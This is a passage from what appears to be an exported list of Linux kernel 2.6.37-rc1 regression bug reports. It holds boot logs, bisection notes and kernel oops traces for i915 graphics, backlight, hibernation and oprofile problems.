ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x2f] lapic_id[0x57] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 87/0x57 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x31] lapic_id[0x61] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 88/0x61 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x33] lapic_id[0x63] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 89/0x63 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x35] lapic_id[0x65] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 90/0x65 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x37] lapic_id[0x67] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 91/0x67 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x39] lapic_id[0x71] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 92/0x71 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x3b] lapic_id[0x73] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 93/0x73 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x3d] lapic_id[0x75] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 94/0x75 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x3f] lapic_id[0x77] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 95/0x77 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x41] lapic_id[0x81] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 96/0x81 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x43] lapic_id[0x83] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 97/0x83 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x45] lapic_id[0x85] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 98/0x85 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x47] lapic_id[0x87] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 99/0x87 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x49] lapic_id[0x91] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 100/0x91 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x4b] lapic_id[0x93] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 101/0x93 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x4d] lapic_id[0x95] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 102/0x95 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x4f] lapic_id[0x97] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 103/0x97 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x51] lapic_id[0xa1] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 104/0xa1 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x53] lapic_id[0xa3] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 105/0xa3 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x55] lapic_id[0xa5] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 106/0xa5 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x57] lapic_id[0xa7] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 107/0xa7 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x59] lapic_id[0xb1] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 108/0xb1 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x5b] lapic_id[0xb3] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 109/0xb3 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x5d] lapic_id[0xb5] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 110/0xb5 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x5f] lapic_id[0xb7] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 111/0xb7 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x61] lapic_id[0xc1] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 112/0xc1 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x63] lapic_id[0xc3] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 113/0xc3 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x65] lapic_id[0xc5] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 114/0xc5 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x67] lapic_id[0xc7] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 115/0xc7 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x69] lapic_id[0xd1] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 116/0xd1 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x6b] lapic_id[0xd3] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 117/0xd3 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x6d] lapic_id[0xd5] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 118/0xd5 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x6f] lapic_id[0xd7] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 119/0xd7 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x71] lapic_id[0xe1] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 120/0xe1 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x73] lapic_id[0xe3] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 121/0xe3 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x75] lapic_id[0xe5] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 122/0xe5 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x77] lapic_id[0xe7] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 123/0xe7 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x79] lapic_id[0xf1] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 124/0xf1 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x7b] lapic_id[0xf3] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 125/0xf3 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x7d] lapic_id[0xf5] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 126/0xf5 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x7f] lapic_id[0xf7] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 127/0xf7 ignored. [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0xff] dfl dfl lint[0x1]) [ 0.000000] ACPI: IOAPIC (id[0x08] address[0xfec00000] gsi_base[0]) [ 0.000000] IOAPIC[0]: apic_id 8, version 32, address 0xfec00000, GSI 0-23 [ 0.000000] ACPI: IOAPIC (id[0x00] address[0xfec08000] gsi_base[24]) [ 0.000000] IOAPIC[1]: apic_id 0, version 32, address 0xfec08000, GSI 24-47 [ 0.000000] ACPI: IOAPIC (id[0x0a] address[0xfec10000] gsi_base[48]) [ 0.000000] IOAPIC[2]: apic_id 10, version 32, address 0xfec10000, GSI 48-71 [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 high edge) [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) [ 0.000000] ACPI: IRQ0 used by override. [ 0.000000] ACPI: IRQ2 used by override. [ 0.000000] ACPI: IRQ9 used by override. [ 0.000000] Using ACPI (MADT) for SMP configuration information [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000 [ 0.000000] 128 Processors exceeds NR_CPUS limit of 64 [ 0.000000] SMP: Allowing 64 CPUs, 0 hotplug CPUs [ 0.000000] nr_irqs_gsi: 88 [ 0.000000] PM: Registered nosave memory: 0000000000095000 - 0000000000096000 [ 0.000000] PM: Registered nosave memory: 0000000000096000 - 00000000000a0000 [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000f0000 [ 0.000000] PM: Registered nosave memory: 00000000000f0000 - 0000000000100000 [ 0.000000] PM: Registered nosave memory: 000000007f600000 - 000000007f62c000 [ 0.000000] PM: Registered nosave memory: 000000007f62d000 - 000000007f79d000 [ 0.000000] PM: Registered nosave memory: 000000007f79d000 - 000000007f7a0000 [ 0.000000] PM: Registered nosave memory: 000000007f7a0000 - 0000000090000000 [ 0.000000] PM: Registered nosave memory: 0000000090000000 - 00000000fec00000 [ 0.000000] PM: Registered nosave memory: 00000000fec00000 - 00000000fee10000 [ 0.000000] PM: Registered nosave memory: 00000000fee10000 - 00000000ff800000 [ 0.000000] PM: Registered nosave memory: 00000000ff800000 - 0000000100000000 [ 0.000000] PM: Registered nosave memory: 0000000480000000 - 0000002000000000 [ 0.000000] PM: Registered nosave memory: 0000002400000000 - 0000004000000000 [ 0.000000] PM: Registered nosave memory: 0000004400000000 - 0000006000000000 [ 0.000000] PM: Registered nosave memory: 0000006400000000 - 0000008000000000 [ 0.000000] PM: Registered nosave memory: 0000008200000000 - 000000a000000000 [ 0.000000] PM: Registered nosave memory: 000000a200000000 - 000000c000000000 [ 0.000000] PM: Registered nosave memory: 000000c200000000 - 000000e000000000 [ 0.000000] Allocating PCI resources starting at 90000000 (gap: 90000000:6ec00000) [ 0.000000] setup_percpu: NR_CPUS:64 nr_cpumask_bits:64 nr_cpu_ids:64 nr_node_ids:8 [ 0.000000] PERCPU: Embedded 26 pages/cpu @ffff88007ee00000 s75520 r8192 d22784 u262144 [ 0.000000] pcpu-alloc: s75520 r8192 d22784 u262144 alloc=1*2097152 [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 [0] 16 24 32 40 48 56 -- -- [ 0.000000] pcpu-alloc: [1] 08 09 10 11 12 13 14 15 [1] 17 25 33 41 49 57 -- -- [ 0.000000] pcpu-alloc: [2] 18 26 34 42 50 58 -- -- [3] 19 27 35 43 51 59 -- -- [ 0.000000] pcpu-alloc: [4] 20 28 36 44 52 60 -- -- [5] 21 29 37 45 53 61 -- -- [ 0.000000] pcpu-alloc: [6] 22 30 38 46 54 62 -- -- [7] 23 31 39 47 55 63 -- -- [ 0.000000] Built 8 zonelists in Zone order, mobility grouping on. Total pages: 24811904 [ 0.000000] Policy zone: Normal [ 0.000000] Kernel command line: console=ttyS0,115200n8 ignore_loglevel printk.time=0 root=/dev/cciss/c0d1p1 BOOT_IMAGE=kernel PID hash table entries: 4096 (order: 3, 32768 bytes) Checking aperture... No AGP bridge found Calgary: detecting Calgary via BIOS EBDA area Calgary: Unable to locate Rio Grande table in EBDA - bailing! Memory: 99187376k/947912704k available (6286k kernel code, 847260136k absent, 1465192k reserved, 6950k data, 628k init) SLUB: Genslabs=15, HWalign=64, Order=0-3, MinObjects=0, CPUs=64, Nodes=8 Hierarchical RCU implementation. RCU-based detection of stalled CPUs is disabled. NR_IRQS:4352 nr_irqs:2008 16 Extended CMOS year: 2000 Console: colour VGA+ 80x25 console [ttyS0] enabled hpet clockevent registered Fast TSC calibration using PIT Detected 2261.072 MHz processor. Calibrating delay loop (skipped), value calculated using timer frequency.. 4522.14 BogoMIPS (lpj=2261072) pid_max: default: 65536 minimum: 512 Security Framework initialized SELinux: Initializing. SELinux: Starting in permissive mode Dentry cache hash table entries: 16777216 (order: 15, 134217728 bytes) Inode-cache hash table entries: 8388608 (order: 14, 67108864 bytes) Mount-cache hash table entries: 256 Initializing cgroup subsys ns ns_cgroup deprecated: consider using the 'clone_children' flag without the ns_cgroup. Initializing cgroup subsys cpuacct Initializing cgroup subsys freezer CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 mce: CPU supports 22 MCE banks CPU0: Thermal monitoring enabled (TM1) using mwait in idle threads. Performance Events: PEBS fmt1+, Nehalem events, Intel PMU driver. ... version: 3 ... bit width: 48 ... generic registers: 4 ... value mask: 0000ffffffffffff ... max period: 000000007fffffff ... fixed-purpose events: 3 ... event mask: 000000070000000f ACPI: Core revision 20101013 DMAR: Host address width 40 DMAR: DRHD base: 0x000000ac000000 flags: 0x0 IOMMU 0: reg_base_addr ac000000 ver 1:0 cap c90780106f0462 ecap f0207e DMAR: DRHD base: 0x000000a8000000 flags: 0x1 IOMMU 1: reg_base_addr a8000000 ver 1:0 cap c90780106f0462 ecap f0207e DMAR: RMRR base: 0x0000007f7ee000 end: 0x0000007f7effff DMAR: RMRR base: 0x0000007f7e7000 end: 0x0000007f7ecfff DMAR: RMRR base: 0x0000007f62e000 end: 0x0000007f62ffff DMAR: ATSR flags: 0x0 DMAR: ATSR flags: 0x0 Not enabling x2apic, Intr-remapping init failed. Setting APIC routing to physical flat ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 CPU0: Intel(R) Xeon(R) CPU X7560 @ 2.27GHz stepping 06 Booting Node 0, Processors #1 #2 #3 #4 #5 #6 #7 Ok. Booting Node 1, Processors #8 #9 #10 #11 #12 #13 #14 #15 Ok. Booting Node 0, Processors #16 Ok. Booting Node 1, Processors #17 Ok. Booting Node 2, Processors #18 Ok. Booting Node 3, Processors #19 Ok. Booting Node 4, Processors #20 Ok. Booting Node 5, Processors #21 Ok. Booting Node 6, Processors #22 Ok. Booting Node 7, Processors #23 Ok. Booting Node 0, Processors #24 Ok. Booting Node 1, Processors #25 Ok. Booting Node 2, Processors #26 Ok. Booting Node 3, Processors #27 Ok. Booting Node 4, Processors #28 Ok. Booting Node 5, Processors #29 Ok. Booting Node 6, Processors #30 Ok. Booting Node 7, Processors #31 Ok. Booting Node 0, Processors #32 Ok. Booting Node 1, Processors #33 Ok. Booting Node 2, Processors #34 Ok. Booting Node 3, Processors #35 Ok. Booting Node 4, Processors #36 Ok. Booting Node 5, Processors #37 Ok. Booting Node 6, Processors #38 Ok. Booting Node 7, Processors #39 Ok. Booting Node 0, Processors #40 Ok. Booting Node 1, Processors #41 Ok. Booting Node 2, Processors #42 Ok. Booting Node 3, Processors #43 Ok. Booting Node 4, Processors</t>
  </si>
  <si>
    <t>Regression in 2.6.37-rc1 for Intel 945 Graphics Adapter - bisected to commit e9e331a</t>
  </si>
  <si>
    <t>2010-11-11 01:56 UTC</t>
  </si>
  <si>
    <t>2011-09-02 08:04 UTC</t>
  </si>
  <si>
    <t>23122 25562 26602</t>
  </si>
  <si>
    <t>On my HP Mini 110 netbook with an Intel 945GME graphics adapter and kernel 2.6.37-rc1, screen blanking has a problem. On this machine, the screen is blanked in two stages. The first leaves the backlight on, the second turns the backlight off. The details of the graphics adapter are as follows: 00:02.0 VGA compatible controller [0300]: Intel Corporation Mobile 945GME Express Integrated Graphics Controller [8086:27ae] (rev 03) Subsystem: Hewlett-Packard Company Device [103c:308f] Kernel driver in use: i915 00:02.1 Display controller [0380]: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller [8086:27a6] (rev 03) Subsystem: Hewlett-Packard Company Device [103c:308f] Beginning with commit e9e331a8abeece1565d383510ed985945132ffe3 as determined with bisection, the system no longer reawakens from the second stage with mouse movements or key presses. The only way to bring it back that I have found is to close the cover. After reopening the cover and entering the password to unlock the system, the screen is restored. The commit message is: Author: Chris Wilson &lt;chris@chris-wilson.co.uk&gt; Date: Mon Sep 13 01:16:10 2010 +0100 drm/i915/lvds: Ensure panel is unlocked for Ironlake or the panel fitter Commit 77d07fd9d73ef28689737c0952dbd5d6a5017743 introduced a regression where by not waiting for the panel to be turned off, left the panel and PLL registers locked across the modeset. Thus the panel remaining blank. As pointed out by Daniel Vetter, when testing LVDS it helps to open the laptop and look at the actual panel you are purporting to test. A second issue with the patch was that in order to modify the panel fitter before gen5, the pipe and the panel must have be completely powered down. So we wait.</t>
  </si>
  <si>
    <t>PROBLEM: i915 modesetting - weird offset graphics (v2.6.37-rc1-27-gff8b16d)</t>
  </si>
  <si>
    <t>2010-11-11 08:01 UTC</t>
  </si>
  <si>
    <t>2010-11-18 23:03 UTC</t>
  </si>
  <si>
    <t>Subject : PROBLEM: i915 modesetting - weird offset graphics (v2.6.37-rc1-27-gff8b16d) Submitter : Jon Masters &lt;jonathan@jonmasters.org&gt; Date : 2010-11-04 7:25 Message-ID : 1288855558.3916.293.camel@constitution.bos.jonmasters.org References : http://marc.info/?l=linux-kernel&amp;m=128885554402886&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>regression since 2.6.36: backlight in sony-laptop not working</t>
  </si>
  <si>
    <t>Platform_x86</t>
  </si>
  <si>
    <t>2010-11-11 08:10 UTC</t>
  </si>
  <si>
    <t>2010-12-02 21:17 UTC</t>
  </si>
  <si>
    <t>Subject : regression since 2.6.36: backlight in sony-laptop not working Submitter : Norbert Preining &lt;preining@logic.at&gt; Date : 2010-11-04 14:29 Message-ID : 20101104142915.GC7650@gamma.logic.tuwien.ac.at References : http://marc.info/?l=linux-kernel&amp;m=128888097600601&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.37-rc1: hibernation breaks swap</t>
  </si>
  <si>
    <t>2010-11-11 08:38 UTC</t>
  </si>
  <si>
    <t>2010-12-17 19:16 UTC</t>
  </si>
  <si>
    <t>this should be a 2.6.36/2.6.37-rc1 regression. In 2.6.36-rc8, everything works well. But in 2.6.37-rc1, system fails to resume from disk. And it can not find the swap partition any more. swapon fails to probe the swap partition.</t>
  </si>
  <si>
    <t>kernel oops on 2.6.37-rc1</t>
  </si>
  <si>
    <t>2010-11-12 16:05 UTC</t>
  </si>
  <si>
    <t>2011-01-04 16:48 UTC</t>
  </si>
  <si>
    <t>Not sure if this is the correct component. Here are the errors: [ 7.034377] BUG: using smp_processor_id() in preemptible [00000000] code: modprobe/483 [ 7.034385] caller is setup_APIC_eilvt+0x155/0x180 [ 7.034389] Pid: 483, comm: modprobe Not tainted 2.6.37-rc1-20101110+ #1 [ 7.034392] Call Trace: [ 7.034400] [&lt;ffffffff812a2b72&gt;] debug_smp_processor_id+0xd2/0xf0 [ 7.034404] [&lt;ffffffff8101e985&gt;] setup_APIC_eilvt+0x155/0x180 [ 7.034413] [&lt;ffffffffa002e168&gt;] op_amd_init+0x88/0x2b0 [oprofile] [ 7.034420] [&lt;ffffffffa0043000&gt;] ? oprofile_init+0x0/0x42 [oprofile] [ 7.034425] [&lt;ffffffffa0043315&gt;] op_nmi_init+0x249/0x2af [oprofile] [ 7.034431] [&lt;ffffffffa00430b4&gt;] oprofile_arch_init+0x11/0x29 [oprofile] [ 7.034437] [&lt;ffffffffa0043010&gt;] oprofile_init+0x10/0x42 [oprofile] [ 7.034441] [&lt;ffffffff810001e3&gt;] do_one_initcall+0x43/0x170 [ 7.034445] [&lt;ffffffff8108a52a&gt;] sys_init_module+0xba/0x200 [ 7.034449] [&lt;ffffffff8100285b&gt;] system_call_fastpath+0x16/0x1b [ 7.034453] [Firmware Bug]: cpu 3, try to setup vector 0x10400, but vector 0xf9 was already reserved by another core, APIC500=0x10000 [ 7.034456] BUG: using smp_processor_id() in preemptible [00000000] code: modprobe/483 [ 7.034463] caller is op_amd_init+0x239/0x2b0 [oprofile] [ 7.034466] Pid: 483, comm: modprobe Not tainted 2.6.37-rc1-20101110+ #1 [ 7.034467] Call Trace: [ 7.034470] [&lt;ffffffff812a2b72&gt;] debug_smp_processor_id+0xd2/0xf0 [ 7.034477] [&lt;ffffffffa002e319&gt;] op_amd_init+0x239/0x2b0 [oprofile] [ 7.034483] [&lt;ffffffffa0043000&gt;] ? oprofile_init+0x0/0x42 [oprofile] [ 7.034489] [&lt;ffffffffa0043315&gt;] op_nmi_init+0x249/0x2af [oprofile] [ 7.034495] [&lt;ffffffffa00430b4&gt;] oprofile_arch_init+0x11/0x29 [oprofile] [ 7.034501] [&lt;ffffffffa0043010&gt;] oprofile_init+0x10/0x42 [oprofile] [ 7.034505] [&lt;ffffffff810001e3&gt;] do_one_initcall+0x43/0x170 [ 7.034508] [&lt;ffffffff8108a52a&gt;] sys_init_module+0xba/0x200 [ 7.034511] [&lt;ffffffff8100285b&gt;] system_call_fastpath+0x16/0x1b [ 7.034514] [Firmware Bug]: cpu 3, IBS interrupt offset 0 not available (MSRC001103A=0x0000000000000100) [ 7.034533] [Firmware Bug]: workaround enabled for IBS LVT offset [ 1440.418082] INFO: task configure:26558 blocked for more than 120 seconds. [ 1440.418088] "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1440.418094] configure D ffffffff81604480 0 26558 22866 0x00000000 [ 1440.418104] ffff8800cdfc1c78 0000000000000086 0000000000000000 0000000000000000 [ 1440.418113] ffff88012b675800 ffff8800cdfc0000 ffff8800cdfc0000 ffff880121b2db40 [ 1440.418122] ffff8800cdfc0010 ffff880121b2def0 ffff8800cdfc1fd8 ffff8800cdfc1fd8 [ 1440.418132] Call Trace: [ 1440.418148] [&lt;ffffffff815c44ee&gt;] ? sub_preempt_count+0xe/0xd0 [ 1440.418156] [&lt;ffffffff815be905&gt;] schedule_timeout+0x215/0x310 [ 1440.418162] [&lt;ffffffff815bdaa1&gt;] ? schedule+0x61/0xa20 [ 1440.418173] [&lt;ffffffff8103ef8a&gt;] ? resched_task+0x4a/0x80 [ 1440.418179] [&lt;ffffffff8103ccc1&gt;] ? get_parent_ip+0x11/0x50 [ 1440.418184] [&lt;ffffffff8103ccc1&gt;] ? get_parent_ip+0x11/0x50 [ 1440.418193] [&lt;ffffffff815bd8aa&gt;] wait_for_common+0xba/0x170 [ 1440.418201] [&lt;ffffffff81047520&gt;] ? default_wake_function+0x0/0x20 [ 1440.418207] [&lt;ffffffff815bda3d&gt;] wait_for_completion+0x1d/0x20 [ 1440.418213] [&lt;ffffffff810970f3&gt;] stop_one_cpu+0x63/0x80 [ 1440.418219] [&lt;ffffffff81046c90&gt;] ? migration_cpu_stop+0x0/0x30 [ 1440.418225] [&lt;ffffffff8103d2a4&gt;] sched_exec+0xe4/0xf0 [ 1440.418232] [&lt;ffffffff811303f6&gt;] do_execve+0xd6/0x320 [ 1440.418240] [&lt;ffffffff8100a925&gt;] sys_execve+0x45/0x70 [ 1440.418248] [&lt;ffffffff81002c7c&gt;] stub_execve+0x6c/0xc0 [ 1560.418069] INFO: task configure:26558 blocked for more than 120 seconds. [ 1560.418075] "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1560.418081] configure D ffffffff81604480 0 26558 22866 0x00000000 [ 1560.418091] ffff8800cdfc1c78 0000000000000086 0000000000000000 0000000000000000 [ 1560.418099] ffff88012b675800 ffff8800cdfc0000 ffff8800cdfc0000 ffff880121b2db40 [ 1560.418106] ffff8800cdfc0010 ffff880121b2def0 ffff8800cdfc1fd8 ffff8800cdfc1fd8 [ 1560.418114] Call Trace: [ 1560.418129] [&lt;ffffffff815c44ee&gt;] ? sub_preempt_count+0xe/0xd0 [ 1560.418137] [&lt;ffffffff815be905&gt;] schedule_timeout+0x215/0x310 [ 1560.418144] [&lt;ffffffff815bdaa1&gt;] ? schedule+0x61/0xa20 [ 1560.418153] [&lt;ffffffff8103ef8a&gt;] ? resched_task+0x4a/0x80 [ 1560.418159] [&lt;ffffffff8103ccc1&gt;] ? get_parent_ip+0x11/0x50 [ 1560.418164] [&lt;ffffffff8103ccc1&gt;] ? get_parent_ip+0x11/0x50 [ 1560.418173] [&lt;ffffffff815bd8aa&gt;] wait_for_common+0xba/0x170 [ 1560.418181] [&lt;ffffffff81047520&gt;] ? default_wake_function+0x0/0x20 [ 1560.418187] [&lt;ffffffff815bda3d&gt;] wait_for_completion+0x1d/0x20 [ 1560.418193] [&lt;ffffffff810970f3&gt;] stop_one_cpu+0x63/0x80 [ 1560.418199] [&lt;ffffffff81046c90&gt;] ? migration_cpu_stop+0x0/0x30 [ 1560.418207] [&lt;ffffffff8103d2a4&gt;] sched_exec+0xe4/0xf0 [ 1560.418214] [&lt;ffffffff811303f6&gt;] do_execve+0xd6/0x320 [ 1560.418222] [&lt;ffffffff8100a925&gt;] sys_execve+0x45/0x70 [ 1560.418230] [&lt;ffffffff81002c7c&gt;] stub_execve+0x6c/0xc0 [ 1680.418070] INFO: task configure:26558 blocked for more than 120 seconds. [ 1680.418076] "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1680.418082] configure D ffffffff81604480 0 26558 22866 0x00000000 [ 1680.418092] ffff8800cdfc1c78 0000000000000086 0000000000000000 0000000000000000 [ 1680.418100] ffff88012b675800 ffff8800cdfc0000 ffff8800cdfc0000 ffff880121b2db40 [ 1680.418108] ffff8800cdfc0010 ffff880121b2def0 ffff8800cdfc1fd8 ffff8800cdfc1fd8 [ 1680.418115] Call Trace: [ 1680.418131] [&lt;ffffffff815c44ee&gt;] ? sub_preempt_count+0xe/0xd0 [ 1680.418139] [&lt;ffffffff815be905&gt;] schedule_timeout+0x215/0x310 [ 1680.418145] [&lt;ffffffff815bdaa1&gt;] ? schedule+0x61/0xa20 [ 1680.418152] [&lt;ffffffff8103ef8a&gt;] ? resched_task+0x4a/0x80 [ 1680.418158] [&lt;ffffffff8103ccc1&gt;] ? get_parent_ip+0x11/0x50 [ 1680.418163] [&lt;ffffffff8103ccc1&gt;] ? get_parent_ip+0x11/0x50 [ 1680.418172] [&lt;ffffffff815bd8aa&gt;] wait_for_common+0xba/0x170 [ 1680.418180] [&lt;ffffffff81047520&gt;] ? default_wake_function+0x0/0x20 [ 1680.418186] [&lt;ffffffff815bda3d&gt;] wait_for_completion+0x1d/0x20 [ 1680.418192] [&lt;ffffffff810970f3&gt;] stop_one_cpu+0x63/0x80 [ 1680.418199] [&lt;ffffffff81046c90&gt;] ? migration_cpu_stop+0x0/0x30 [ 1680.418207] [&lt;ffffffff8103d2a4&gt;] sched_exec+0xe4/0xf0 [ 1680.418214] [&lt;ffffffff811303f6&gt;] do_execve+0xd6/0x320 [ 1680.418222] [&lt;ffffffff8100a925&gt;] sys_execve+0x45/0x70 [ 1680.418230] [&lt;ffffffff81002c7c&gt;] stub_execve+0x6c/0xc0</t>
  </si>
  <si>
    <t>BUG in i915 GEM on resume from suspend</t>
  </si>
  <si>
    <t>2010-11-12 16:18 UTC</t>
  </si>
  <si>
    <t>2010-11-18 23:06 UTC</t>
  </si>
  <si>
    <t>Blank screen on resume from suspend to ram, with this in the dmesg: [ 473.680734] ------------[ cut here ]------------ [ 473.680737] kernel BUG at drivers/gpu/drm/i915/i915_gem.c:4568! [ 473.680740] invalid opcode: 0000 [#1] SMP [ 473.680744] last sysfs file: /sys/devices/pci0000:00/0000:00:1f.2/host1/target1:0:0/1:0:0:0/block/sda/sda1/stat [ 473.680746] CPU 0 [ 473.680748] Modules linked in: netconsole configfs i915 drm_kms_helper binfmt_misc drm i2c_algo_bit ppdev bridge stp bnep video output lp parport snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer usbhid snd_seq_device snd pcspkr intel_agp iTCO_wdt iTCO_vendor_support shpchp intel_gtt soundcore snd_page_alloc uhci_hcd ehci_hcd usbcore r8169 floppy mii [ 473.680856] [ 473.680915] Pid: 2583, comm: Xorg Not tainted 2.6.37-rc1+ #104 P5Q-EM/System Product Name [ 473.680917] RIP: 0010:[&lt;ffffffffa0291b28&gt;] [&lt;ffffffffa0291b28&gt;] i915_gem_entervt_ioctl+0x1d8/0x1e0 [i915] [ 473.680930] RSP: 0018:ffff88021c5b5d68 EFLAGS: 00010283 [ 473.680932] RAX: ffff88022762d530 RBX: ffff88022762c000 RCX: 0000000000000000 [ 473.680935] RDX: 000000000001fff8 RSI: 000000000001f001 RDI: ffff8802276b2000 [ 473.680937] RBP: ffff88021c5b5d88 R08: 0000000000000000 R09: ffff880000000000 [ 473.680939] R10: 0000000000000001 R11: 0000000000000020 R12: 0000000000000000 [ 473.680941] R13: ffff8802276b2000 R14: ffff8802276b2020 R15: 0000000000000000 [ 473.680943] FS: 00007f8713efd700(0000) GS:ffff8800cda00000(0000) knlGS:0000000000000000 [ 473.681002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 473.681004] CR2: 00007ff81e576000 CR3: 000000021c507000 CR4: 00000000000406b0 [ 473.681007] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 473.681009] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 473.681011] Process Xorg (pid: 2583, threadinfo 